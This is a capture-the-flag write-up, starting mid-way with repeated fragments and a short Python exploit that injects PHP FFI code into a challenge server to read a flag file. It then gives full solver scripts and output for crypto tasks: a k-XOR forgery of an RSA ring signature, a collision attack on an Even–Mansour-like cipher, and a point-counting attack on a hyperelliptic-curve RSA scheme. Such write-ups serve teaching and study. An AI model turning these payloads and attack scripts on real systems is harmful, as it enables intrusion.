flag_wAt3_uP_apA3H1
    $f = FFI::load ('/flag.h');
    $f = FFI::load ('/flag.h');
    $f = FFI::load ('/flag.h');
    $f = FFI::load ('/flag.h');
    $f = FFI::load ('/flag.h');
/flag.h
/flag.h
COPE "flag
COPE "flag
COPE "flag

Full exploit:

#!/usr/bin/env python3
import requests

payload = '''
$ffi = FFI::load('/flag.h');
var_dump(FFI::string($ffi->flag_wAt3_uP_apA3H1()));
'''
host = 'pwnable.org'
r = requests.get(f'http://{host}:19261/', params={'rh': payload})
print(r.text, r.status_code)

Flag: flag{YoU_C3nT_u3iNg_FPm_n0w}

babyring

yyyyyyy | crypto, 47 solves, 192 points

This task consisted of an RSA ring signature with a linear E function:

            self.request.sendall("message: ")
            msg = self.request.recv(0x40).strip()
            ys = []
            for i in range(K):
                self.request.sendall("x%d: " % i)
                x = int(self.request.recv(0x40).strip())
                ys.append(pow(x,e,Ns[i]))
            self.request.sendall("v: ")
            v = int(self.request.recv(0x40).strip())
                
            key = sha256(msg).digest()[:16]
            E = ARC4.new(key)
            cur = v
            for i in range(K):
                pt = (ys[i]^cur)%(1<<64)
                ct = unpack('Q', E.encrypt(pack('Q',pt)))[0]
                cur = ct
                
            if cur == v:
                self.request.sendall("%s\n" % flag)

The thing to note here is that the RC4 encryptions are just XORs with constants that depend on the message only. Thus, we can phrase the problem as follows:

Find values $x_0,…,x_{63}$ such that \[ \bigoplus_{i=0}^{63} \big((x_i^e\bmod N_i)\bmod 2^{64}\big) = \bigoplus_{i=0}^{63} \mathrm{RC4}_{\mathit{key}}(00…0) \,\text. \]

Since the key is just a hash of the message, we can consider the right-hand side to be a constant; let’s call it target. Now this problem is an instance of the $k$-XOR problem (here $k=64$) with respect to the functions $f_i\colon x\mapsto (x^e\bmod N_i)\bmod 2^{64}$.

We applied Wagner’s algorithm to solve it:

Set $s=11$.
For each $i=0,…,63$, create a list $L_i$ of $2^s$ random values $x_0,…,x_{2^s-1}$ and the corresponding images $y_j:=f_i(x_j)$.
Now don’t forget to XOR every $y_j$ in $L_0$ with the $\mathrm{target}$ to reduce to the case of finding a combination of $y_j$s whose XOR is zero.
For $k=s,2s,3s,…,64$, do:
1. Partition the remaining $\ell$ lists into $\ell/2$ pairs of lists. For each pair of lists, compute all XORs of combinations in the cartesian product and add the “survivors” whose lower $k$ bits are zero to a new list. This yields $\ell/2$ new lists which, on average, also have around $2^s$ elements.
At the end, simply pick one of the combinations that XORed to zero on the full 64 bits. As we’ve hopefully kept track of which element from which list went into our final result, we have now solved the problem.

Here’s a straightforward sage implementation (in hindsight, pure Python would’ve been enough):

#!/usr/bin/env sage
import socket, re, string, itertools, hashlib

e, Ns = # from task.py...

from hashlib import sha256
from struct import pack, unpack
from Crypto.Cipher import ARC4
msg = b'hxp says hi <3'
key = sha256(msg).digest()[:16]
E = ARC4.new(key)
target = 0
for i in range(64):
    target ^^= unpack('Q', E.encrypt(pack('Q',0)))[0]
print(f'target: {target}')

size = 64
step = 11

num = 2**step
xss, yss = [], []
for i,N in enumerate(Ns):
    xss.append([])
    yss.append([])
    while len(xss[-1]) < num:
        x = randrange(10**30)
        y = ZZ(pow(x,e,N))
        xss[-1].append(x)
        yss[-1].append(y)

for i in range(num):
    yss[0][i] ^^= target    #XXX

lists = [[(y % 2**size, [i]) for i,y in enumerate(ys)] for ys in yss]
for bits in range(step,size+step,step):
    if bits > size: bits = size
    print(f'{bits:3}:', ' '.join(f'{len(vs):3}' for vs in lists))
    new_lists = []
    for i in range(0,len(lists),2):
        vs, ws = lists[i:i+2]
        tab = dict()
        for v,jv in vs:
            if v % 2**bits not in tab:
                tab[v % 2**bits] = []
            tab[v % 2**bits].append((v,jv))
        us = []
        for w,jw in ws:
            if w % 2**bits in tab:
                for v,jv in tab[w % 2**bits]:
                    us.append((v^^w, jv+jw))
        new_lists.append(us)
    lists = new_lists

vs, = lists
js = choice(vs)[-1]

########################################

sock = socket.socket()
sock.connect(('pwnable.org', 10001))

if 1:
    s = b'';
    while b'Give me XXX' not in s:
        tmp = sock.recv(0x100); assert tmp; s += tmp
    m = re.search(r'XXXX.([^)]+)\) == ([0-9a-f]+)', s.decode())
    suffix, d = m.groups()
    alph = string.ascii_letters + string.digits
    for s in map(''.join, itertools.product(*(alph for _ in range(4)))):
        if hashlib.sha256((s + suffix).encode()).hexdigest() == d:
            sock.sendall(s.encode() + b'\n')
            break
    else:
        assert False

print('PoW done')

print(sock.recv(0x100))
print(repr(msg.decode()))
sock.sendall(f'{msg.decode()}\n'.encode())

for j,xs in zip(js,xss):
    print(sock.recv(0x100))
    print(xs[j])
    sock.sendall(f'{xs[j]}\n'.encode())

print(sock.recv(0x100))
sock.sendall(b'1337\n')

import telnetlib
tel = telnetlib.Telnet()
tel.sock = sock
tel.interact()

This script takes something like a minute to obtain the flag:

$ ./pwn.sage
target: 8276634191980152343
 11: 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048
 22: 2059 2089 2021 1962 2057 2037 2001 2127 2041 2032 2029 2162 1951 2071 2023 1994 2157 2102 2069 2090 1992 2143 2119 1988 2083 2018 2055 2131 2116 2070 2068 2015
 33: 2107 1909 2033 2044 1990 2179 1974 2050 2205 2104 2092 2076 2054 2171 2161 2015
 44: 1892 2019 2152 2016 2275 2084 2173 2158
 55: 1865 2021 2272 2313
 64: 1908 2554
PoW done
b'message: '
'hxp says hi <3'
b'x0: '
778839742531702085085918402323
b'x1: '
767810811277392870554785268207
b'x2: '
533823740576130506591957937542
b'x3: '
406048316929611234580511618372
b'x4: '
917595194209625280535310293132
b'x5: '
98697750238179915891908495330
b'x6: '
551743936488196518412877796684
b'x7: '
962597283591884938034877019337
b'x8: '
786844723262420032812069542526
b'x9: '
153320670470652943712842694641
b'x10: '
378095423297957378355258043727
b'x11: '
953702789823393737483018538503
b'x12: '
182193542884503780939807852848
b'x13: '
46495574229303804465885559630
b'x14: '
595631858452843522184816514055
b'x15: '
58666905983251272690678338677
b'x16: '
283554279898585069086241687161
b'x17: '
84880053022417755331634480195
b'x18: '
521647021209199036075434406048
b'x19: '
384899853088268825825438159613
b'x20: '
567960805944765918951751597198
b'x21: '
672107144804729904594270852913
b'x22: '
541045749332302907100746368583
b'x23: '
92824571709438415986293186286
b'x24: '
477147860488926799302982864269
b'x25: '
338163136407181436575863421171
b'x26: '
972280614719358362962864483493
b'x27: '
436626897223963794966197005647
b'x28: '
558217022539528839195305267721
b'x29: '
125243008830069384201451225092
b'x30: '
621734819720870576083660228285
b'x31: '
118761737325065505597396904205
b'x32: '
627480934295185641796962719819
b'x33: '
758905517622845846307886470180
b'x34: '
141211197519816039577798386292
b'x35: '
392146911880054924027563031799
b'x36: '
566111529644772961628208269856
b'x37: '
548693776779838000511853166180
b'x38: '
331531753239151634777122549477
b'x39: '
759036502233547269036820334115
b'x40: '
11018713707098210728900499136
b'x41: '
906703021096737735178206938192
b'x42: '
734213979648936229894080649422
b'x43: '
638704139451788125588461207264
b'x44: '
46707244256760448287934430536
b'x45: '
978627963455096158454839000558
b'x46: '
72990589689741453572135904905
b'x47: '
877633260085019814260895648090
b'x48: '
256930679356950403881760627528
b'x49: '
792820765417180381752478023807
b'x50: '
344223671332224711494990326115
b'x51: '
980971256788779058167186917372
b'x52: '
334524080250831856206886309133
b'x53: '
746190096546671689250644207305
b'x54: '
567687287704628586183874509373
b'x55: '
476331428542598362586002069710
b'x56: '
423087411891158399168500472004
b'x57: '
72163376030501636444997178485
b'x58: '
709628295038186534429098402709
b'x59: '
472082433020220515600036333065
b'x60: '
701911320993688779387178774929
b'x61: '
435885933415343827864793767375
b'x62: '
125164298654176511111017028113
b'x63: '
601185399153238162757103066613
b'v: '
flag{babbbcbdbebfbgbhbibjbkblbmbnbobpbqbrbsbtbubvbwbxby}
fin
*** Connection closed by remote host ***

emmm

yyyyyyy | crypto, 18 solves, 392 points

This task consisted of a remarkably simple block cipher, of which we’re given $2^{24}$ plaintext‑ciphertext pairs:

#!/usr/bin/python2
import random
from struct import pack,unpack

from flag import flag

P = 247359019496198933
C = 223805275076627807
M = 2**60
K0 = random.randint(1, P-1)
K1 = random.randint(1, P-1)

# not a bijection? can be adjusted but I'm lazy
def encrypt_block(x):
    tmp = x * K0 % P
    tmp = tmp * C % M
    tmp = tmp * K1 % P
    return tmp
    
for i in range(2**24):
    pt = random.randint(1, P-1)
    ct = encrypt_block(pt)
    print pt, ct

pt = flag[5:-1]
assert flag.startswith('flag{') and flag.endswith('}') and len(pt)%8==0
fmt = '%dQ' % (len(pt)/8)
ct = pack(fmt, *map(encrypt_block, unpack(fmt, pt)))
print ct.encode('hex')

So, the only thing that’s really happening here is two multiplications modulo $p$ with secrets, with an application of a publicly known function \[ \label{pi}\tag{$\ast$} \pi\colon\quad \mathbb Z/p\to\mathbb Z/p,\; a \mapsto a\cdot c\bmod 2^{60} \] in between.

After unsuccessfully trying for a while to make use of some mathematical interaction between the $\bmod p$ and the $\bmod 2^{60}$ part, the structure of the cipher reminded me of the Even–Mansour scheme, which encrypts as \[ x \longmapsto K_1 \oplus \pi(K_0\oplus x) \,\text, \] where $\pi$ is some permutation. For comparison, the challenge uses \[ x \longmapsto K_1 \cdot \pi(K_0\cdot x) \,\text, \] where everything is modulo $p$ and $\pi$ is the function $\eqref{pi}$.

Searching for attacks against E–M, I quickly found this paper, which gives a $2^{n-d}$ attack when $n$ is the block size and $2^d$ plaintext-ciphertext pairs are known. Here, $n\approx 58$ and $d\approx 24$, so — of course assuming the attack generalizes — we would expect about $2^{34}$ work, which is very feasible.

I’ll skip repeating the explanation of how the paper breaks original E–M; it is explained very clearly in Section 3.2. Instead, let’s get straight to the version of the attack that breaks the CTF challenge:

Pick a random value $\lambda\in\mathbb Z/p$ and pray that the data set contains $x,x’$ such that $x \cdot x’ = \lambda/K_0$. (All computations are modulo $p$.)
Observe that $E(x’)=K_1\cdot\pi(\lambda/x)$, and (by symmetry) similarly for $x$.
Divide these two equations to cancel $K_1$, thus yielding $E(x)/E(x’) = \pi(x’/\lambda)/\pi(x/\lambda)$.
Notice that this equation can be rewritten as $E(x)\cdot \pi(x/\lambda) = E(x’)\cdot \pi(x’/\lambda)$.
Now, each $x$ only occurs on one side of the equation, so we have reduced to a collision-finding problem: Find two values $x,x’$ in the set of plaintexts such that $F_\lambda\colon E(x)\cdot\pi(x/\lambda)$ collides. Due to the birthday “paradox”, this has expected probability about $2^{2d}/p$, which here (with $d=24$, $p\approx 2^{58}$) equals about ${1}/{1000}$.
Once we’ve found a collision, recover the corresponding candidate for $K_0$ as $\lambda/(x\cdot x’)$.

Here’s a C++ implementation of this step:

using u64 = uint64_t;
using u128 = __uint128_t;

const u64 p = 247359019496198933;
const u64 c = 223805275076627807;
const u64 m = ((u64) 1) << 60;

static u64 pi(u64 a)
{
    return c * a % m % p;
}

static u64 mul(u64 a, u64 b)
{
    return (u128) a * (u128) b % (u128) p;
}

static std::tuple<int64_t,int64_t,int64_t> xgcd(int64_t x, int64_t y)
{
    std::vector<int64_t> qs;
    qs.reserve(64);
    while (y) {
        int64_t q = x / y;
        int64_t r = x % y;
        qs.push_back(q);
        x = y;
        y = r;
    }
    int64_t a = 1, b = 0;
    while (!qs.empty()) {
        int64_t t = b;
        b = a - qs.back() * b;
        a = t;
        qs.pop_back();
    }
    return {x,a,b};
}

static u64 inv(u64 a)
{
    auto t = xgcd(a, p);
    assert(std::get<0>(t) == 1);
    int64_t r = std::get<1>(t);
    if (r < 0) r += p;
    assert(0 <= r && (u64) r < p);
    assert(mul(r,a) == 1);
    return r;
}

std::vector<std::pair<u64,u64>> xys; /* loaded by main() */

std::optional<u64> find_k0(u64 lambda)
{
    std::unordered_map<u64,u64> tab;

    for (auto const& xy: xys) {

        u64 x, y;
        std::tie(x,y) = xy;
        u64 inv_x = inv(x);

        u64 v = mul(y, pi(mul(lambda, inv_x)));

        auto it = tab.find(v);
        if (it != tab.end()) {
            u64 k0 = mul(lambda, inv(mul(x, it->second)));
            std::cout << lambda << " ~> " << k0 << std::endl;
            return k0;
        }

        tab[v] = x;
    }

    std::cout lambda << " ~> fail" << std::endl;
    return {};
}

After running this for a little longer than 5 core hours with random choices of lambda, we got a candidate $K_0 = 134854706973672807$. Solving for $K_1$ given $K_0$ is easy, and indeed it turned out that the given plaintext-ciphertext pairs were consistent with this guess for $K_0$ (i.e., all gave the same $K_1$ value).

Now that we’ve recovered the key, the last thing to do is to brute-force away the non-uniqueness of decryption, which was hinted at by the comment

# not a bijection? can be adjusted but I'm lazy

This is again an easy task. Note there are two operations which destroy information: Right at the input, which is considered only modulo $p$, and then again at the $\pi$ part (which is only a function on $\mathbb Z/p$ but not a permutation).

Filtering for potential plaintexts that were valid ASCII left us with the following choices:

-->  w9K
        [ h@
            c3_7o_br1/n1I!'UfoR_thE_5ign0Ra.
-->  w9K
        [ h@
            c3_7o_br1ng_tHis_foR_thE_5ign0Ra.
-->  w9K
        [_a5k3d_m3_7o_br1/n1I!'UfoR_thE_5ign0Ra.
-->  w9K
        [_a5k3d_m3_7o_br1ng_tHis_foR_thE_5ign0Ra.
--> _p4droNe h@
               c3_7o_br1/n1I!'UfoR_thE_5ign0Ra.
--> _p4droNe h@
               c3_7o_br1ng_tHis_foR_thE_5ign0Ra.
--> _p4droNe_a5k3d_m3_7o_br1/n1I!'UfoR_thE_5ign0Ra.
--> _p4droNe_a5k3d_m3_7o_br1ng_tHis_foR_thE_5ign0Ra.

simple curve

yyyyyyy | crypto, 16 solves, 423 points

This task consisted of an RSA-style encryption scheme based on a hyperelliptic genus-2 curve defined over $\mathbb F_{2^{256}}$.

The code greets us with scary functions such as this:

def add(p1, p2):
    a1, b1 = p1
    a2, b2 = p2
    d1, e1, e2 = xgcd(a1, a2)
    d, c1, c2 = xgcd(d1, b1+b2+h)
    di = PP(1/d)
    a = a1*a2*di*di
    b = (c1*e1*a1*b2+c1*e2*a2*b1+c2*(b1*b2+f))*di
    b %= a

    while a.degree() > 2:
        a = PP((f-b*h-b*b)/a)
        b = (-h-b)%a
    a = a.monic()
    return a, b

…but after staring at this for a bit I recognized the familiar Mumford coordinate system for Jacobians of hyperelliptic curves.

Since the challenge performed an RSA-style encryption, the goal was clear: Compute the group order. Generally, point counting on higher-dimensional abelian varieties is rather painful, but there’s a shortcut in this case: The curve is in fact defined over $\mathbb F_2$! By general theory, we can easily describe the order of the Jacobian over extension fields when given the characteristic polynomial of the Frobenius endomorphism over the base field, which is really easy here because $\mathbb F_2$ is literally the smallest field.

Here’s (a shortened and paraphrased version of) the relevant Theorem 14.17 from the Handbook of Elliptic and Hyperelliptic Curve Cryptography (p. 311 in the 2^nd edition):

Theorem. Let $C$ be a genus-$g$ hyperelliptic curve defined over $\mathbb F_q$ and let the factorization of the characteristic polynomial $\chi\in\mathbb Z[T]$ of its $\mathbb F_q$‑Frobenius endomorphism be \[ \chi(T) = \prod_{i=1}^{2g} (T-\tau_i) \;\in \mathbb C[T] \,\text. \] Then (among other things) \[ \lvert J_C(\mathbb F_{q^r})\rvert = \prod_{i=1}^{2g} (1-\tau_i^r) \,\text. \]

Hence, we may simply compute the Frobenius polynomial over $\mathbb F_2$ and very easily deduce the order of the Jacobian over $\mathbb F_{2^{256}}$ from that! Using the definitions from the given chall.sage:

C = HyperellipticCurve(f,h)
C = C.change_ring(GF(2))

print(C)
g = C.genus()
print('genus:', g)

pi = C.frobenius_polynomial()
print('π =', pi.factor())

rs = pi.roots(ring=QQbar)
rs = sum(([r]*m for r,m in rs), [])
assert len(rs) == 2*g
print(rs)

N = ZZ(prod(1-r**256 for r in rs))
print(N)
print(factor(N))

ctext = ([113832590633816699072296178013238414056344242047498922038140127850188287361982, 107565990181246983920093578624450838959059911990845389169965709337104431186583, 1], [60811562094598445636243277376189331059312500825950206260715002194681628361141, 109257511993433204574833526052641479730322989843001720806658798963521316354418])
ctext = tuple(sum(F.fetch_int(c)*w**i for i,c in enumerate(cs)) for cs in ctext)
ptext = mul(ctext, ZZ(Mod(e,N)**-1))
flag = decode(ptext)
print(ZZ(flag[0][0]))
print(bytes.fromhex('{:x}'.format(ZZ(flag[0][0]))))

This ~~kills the crab~~ prints the flag:

Hyperelliptic Curve over Finite Field of size 2 defined by y^2 + (x^2 + x)*y = x^5 + x^3 + 1
genus: 2
π = x^4 - x^2 + 4
[-1.118033988749895? - 0.866025403784439?*I, -1.118033988749895? + 0.866025403784439?*I, 1.118033988749895? - 0.866025403784439?*I, 1.118033988749895? + 0.866025403784439?*I]
13407807929942597099574024998205846127384782207827457971403006387925941306569427075743805985793764139096494648696821820448189053384542053304334065342873600
2^18 * 3^2 * 5^2 * 17^4 * 113^2 * 137^2 * 769^2 * 9601^2 * 138113^2 * 5649473^2 * 170045569^2 * 2147442977^2 * 1601948502115309903982784222721^2
[z256^245 + z256^244 + z256^240 + z256^238 + z256^237 + z256^235 + z256^234 + z256^233 + z256^230 + z256^228 + z256^226 + z256^222 + z256^221 + z256^218 + z256^216 + z256^214 + z256^213 + z256^212 + z256^209 + z256^206 + z256^205 + z256^202 + z256^200 + z256^197 + z256^196 + z256^194 + z256^192 + z256^190 + z256^189 + z256^188 + z256^186 + z256^182 + z256^181 + z256^179 + z256^176 + z256^174 + z256^173 + z256^171 + z256^170 + z256^169 + z256^166 + z256^162 + z256^161 + z256^160 + z256^158 + z256^156 + z256^155 + z256^154 + z256^153 + z256^152 + z256^150 + z256^147 + z256^142 + z256^141 + z256^140 + z256^139 + z256^136 + z256^134 + z256^133 + z256^132 + z256^125 + z256^124 + z256^121 + z256^120 + z256^118 + z256^117 + z256^116 + z256^113 + z256^110 + z256^109 + z256^106 + z256^104 + z256^101 + z256^100 + z256^96 + z256^93 + z256^92 + z256^88 + z256^86 + z256^85 + z256^83 + z256^80 + z256^78 + z256^76 + z256^70 + z256^69 + z256^68 + z256^66 + z256^62 + z256^61 + z256^59 + z256^56 + z256^54 + z256^53 + z256^49 + z256^48 + z256^46 + z256^44 + z256^43 + z256^42 + z256^41 + z256^40 + z256^38 + z256^37 + z256^33 + z256^32 + z256^30 + z256^29 + z256^28 + z256^26 + z256^24 + z256^22 + z256^21 + z256^20 + z256^17 + z256^14 + z256^13 + z256^12 + z256^10 + z256^9 + z256^5 + z256^4 + z256 + 1, 1]
z256^252 + z256^251 + z256^250 + z256^248 + z256^243 + z256^241 + z256^238 + z256^237 + z256^235 + z256^233 + z256^232 + z256^231 + z256^227 + z256^225 + z256^222 + z256^221 + z256^215 + z256^213 + z256^212 + z256^211 + z256^210 + z256^207 + z256^206 + z256^200 + z256^198 + z256^195 + z256^194 + z256^193 + z256^192 + z256^191 + z256^189 + z256^187 + z256^186 + z256^185 + z256^184 + z256^183 + z256^181 + z256^179 + z256^177 + z256^176 + z256^175 + z256^174 + z256^173 + z256^172 + z256^171 + z256^169 + z256^165 + z256^163 + z256^162 + z256^160 + z256^156 + z256^154 + z256^151 + z256^150 + z256^145 + z256^144 + z256^141 + z256^140 + z256^139 + z256^136 + z256^135 + z256^134 + z256^131 + z256^124 + z256^123 + z256^122 + z256^120 + z256^117 + z256^112 + z256^111 + z256^110 + z256^109 + z256^108 + z256^103 + z256^101 + z256^99 + z256^98 + z256^96 + z256^95 + z256^92 + z256^91 + z256^88 + z256^87 + z256^82 + z256^81 + z256^77 + z256^75 + z256^73 + z256^68 + z256^67 + z256^66 + z256^65 + z256^64 + z256^63 + z256^61 + z256^58 + z256^57 + z256^55 + z256^54 + z256^53 + z256^52 + z256^50 + z256^49 + z256^47 + z256^46 + z256^42 + z256^41 + z256^38 + z256^35 + z256^32 + z256^27 + z256^26 + z256^22 + z256^20 + z256^19 + z256^18 + z256^17 + z256^16 + z256^15 + z256^12 + z256^10 + z256^9 + z256^7 + z256^4 + z256^3
87336973591408809511144500944284390061575902317760214640835643492103517747
b'1nTere5tinG_Hyp3re11iPtic_curv3'